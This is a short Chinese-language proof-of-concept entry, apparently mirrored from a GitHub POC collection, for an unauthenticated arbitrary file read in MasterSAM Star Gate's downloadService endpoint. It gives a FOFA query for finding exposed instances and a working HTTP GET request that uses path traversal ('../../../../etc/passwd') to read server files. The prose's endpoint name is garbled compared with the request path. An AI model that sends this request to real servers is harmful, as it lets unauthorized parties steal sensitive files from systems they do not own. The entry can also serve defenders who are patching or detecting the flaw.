mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-05-05 10:17:57 +00:00
24 lines
585 B
Markdown
24 lines
585 B
Markdown
|
# MasterSAM接口downloadService任意文件读取
|
|||
|
|
|
|||
|
|
**MasterSAM Star Gate的/adamaladamalduwnoadService接口存在任意文件下载漏洞,未经身份验证的攻击者可以通过该漏洞下载服务器任意文件,从而获取大量敏感信息。**
|
|||
|
|
|
|||
|
|
## fofa
|
|||
|
|
|
|||
|
|
```javascript
|
|||
|
|
body="MasterSAM"
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
## poc
|
|||
|
|
|
|||
|
|
```javascript
|
|||
|
|
GET /adama/adama/downloadService?type=1&file=../../../../etc/passwd HTTP/1.1
|
|||
|
|
Host: your-ip
|
|||
|
|
```
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
|
|||
|
|
## 漏洞来源
|
|||
|
|
|
|||
|
|
- https://mp.weixin.qq.com/s/f35n0-9OOME5gSsiwEv0Vg
|